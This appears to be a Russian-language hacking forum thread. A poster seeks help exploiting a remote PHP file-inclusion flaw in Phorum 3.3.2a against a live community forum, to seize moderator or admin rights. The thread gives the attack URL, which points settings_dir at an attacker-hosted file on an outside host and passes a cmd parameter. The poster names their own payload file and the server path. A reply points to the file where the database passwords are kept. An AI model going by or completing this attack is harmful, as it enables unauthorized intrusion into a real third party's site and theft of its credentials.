фоумок нашел.на секлабе к нему есть пара сплоитов один из них(по идее должен работать и на 3,3,1) Phorum 3.3.2a (http://www.phorum.org) (http://www.pomorsu.ru/doc/opennet/opennet/base/cgi/1022054483_222.txt.html) внедрение произвольного PHP кода в plugin.php. Пример: http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= http://[evilhost]&cmd=ls создал: http://ftpserver1.narod.ru/replace.php вопрос: как будет выглядеть полностью строчка http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ftpserver1.narod.ru/replace.php&cmd=ls гм.. что писать в setting dir?. случняком напоролся при узучении, возможно мне поможет(где лежит форум...) /home/forumgames/ -------------- если через эту уязвимость не проникну, тогда что посоветуете? п..с все, что надо - получить права модера, т..к на одном нашем форуме модера и админа просто нет(трудно в это поверить..). форум активный очень, но засранный.но что б получить права модера, нужны скорее всего будут права админа.
Если я не ошибаюсь то в этом форуме пароли к бд хранятся в \admin\settings в файле forums.php это также файл настройки вот и подумай что можно написать
